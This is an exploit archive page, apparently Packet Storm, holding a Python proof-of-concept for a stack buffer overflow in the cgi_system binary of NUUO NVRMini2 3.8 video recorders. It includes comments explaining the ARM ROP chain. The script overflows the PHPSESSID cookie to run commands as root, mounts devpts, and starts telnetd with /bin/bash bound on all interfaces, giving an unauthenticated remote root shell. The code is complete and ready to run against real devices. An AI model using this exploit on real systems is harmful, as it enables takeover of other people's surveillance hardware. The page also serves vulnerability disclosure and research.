Twenty Year Anniversary

NUUO NVRMini2 3.8 Buffer Overflow

NUUO NVRMini2 3.8 Buffer Overflow
Posted Sep 19, 2018
Authored by Jacob Baines

NUUO NVRMini2 version 3.8 cgi_system buffer overflow exploit.

tags | exploit, overflow
MD5 | 08097a106baa047edbd143cdc755dca7

NUUO NVRMini2 3.8 Buffer Overflow

Change Mirror Download
# Exploit Title: NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)
# Date: 2018-09-17
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.nuuo.com/
# Device: NRVMini2
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Versions: 3.8.0 and below
# Tested Against: 03.07.0000.0011 and 03.08.0000.0005
# Tested on: Ubuntu and OSX
# CVE: N/A
# TRA: https://www.tenable.com/security/research/tra-2018-25
# Description:

# A stack buffer overflow exists in the cgi_system binary. The error occurs
# due to lack of bounds checking on the PHPSESSID value before and when
# it is passed to sprintf in order to generate the session id file name.
# As written, this exploit enables Telnet.

# Executes a command via the stack buffer overflow in cookie parsing. The command
# is executed via 'system' as root. The overlow logic is like so:
#
# address 1: 405e2e34 - load system into r3 and address 2 into lr
#
# .text:000D0E34 0F 48 BD E8 LDMFD SP!, {R0-R3,R11,LR}
# .text:000D0E38 1E FF 2F E1 BX LR
#
# address 2: 406037cc - load the system command into r0. Jump to system.
#
# .text:000F17CC 0D 00 A0 E1 MOV R0, SP
# .text:000F17D0 33 FF 2F E1 BLX R3
#
# [ address 1 ][ r0 ][ r1 ][ r2 ][ r3 system ][ r11 ][ LR - addr2 ][ system command ]
# \x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40touch /tmp/lolwat

# PoC

import requests
import socket
import sys

def stack_buffer_overflow(command, ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print '[+] Executing %s on %s:%s...' % (command, ip, port)
sock.connect((ip, int(port)))
exec_request = ('GET /cgi-bin/cgi_system?cmd=portCheck HTTP/1.1\r\n' +
'Host: ' + ip + ':' + port + '\r\n' +
'Accept: */*\r\n' +
'Cookie: PHPSESSID=982e6c010064b3878a4b793bfab8d2d2' +
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAABBBBCCCCDD' +
'\x34\x2e\x5e\x40\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xcc\xcc\xcc\xcc\xfc\xbf\x54\x40\xee\xee\xee\xee\xcc\x37\x60\x40' + command +
'\r\n\r\n')
sock.sendall(exec_request)
data = sock.recv(1024)
sock.close()

# We should get a 500 Internal error in response
return data.find('500') != -1

# Quickly tries to grab the version of the target. If the target is
# using anything other than 3.7 or 3.8 then we'll bail out since
# haven't tested on any other targets

def check_target(ip, port):
index = requests.get('http://' + ip + ':' + port + "/upgrade_handle.php?cmd=getcurrentinfo")
return (index.text.find('<Titan>03.08') != -1 or index.text.find('<Titan>03.07') != -1)

if __name__ == "__main__":

if (len(sys.argv) != 3):
print "Usage: python nvrmini2_enable_telnet.py <ipv4 address> <port>"
sys.exit(1)

ip = sys.argv[1]
port = sys.argv[2]

if int(port) > 65535:
print('[-] Invalid port parameter')
sys.exit(0)

if len(ip.split('.')) != 4:
print('[-] Invalid IP address parameter')
sys.exit(0)

print '[+] Checking for a valid target...'
if (check_target(ip, port) == False):
print('[-] The target is not a NVRMini2 or its using an untested version.')
sys.exit(0)
print '[+] Valid target!'

if (stack_buffer_overflow('mount -t devpts devpts /dev/pts', ip, port) == False):
print('[-] Mount failed')
sys.exit(0)

if (stack_buffer_overflow('/bin/sh -c "/usr/sbin/telnetd -l /bin/bash -b 0.0.0.0"&', ip, port) == False):
print('[-] telnetd bind failed')
sys.exit(0)

print('[+] Success!')


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    14 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close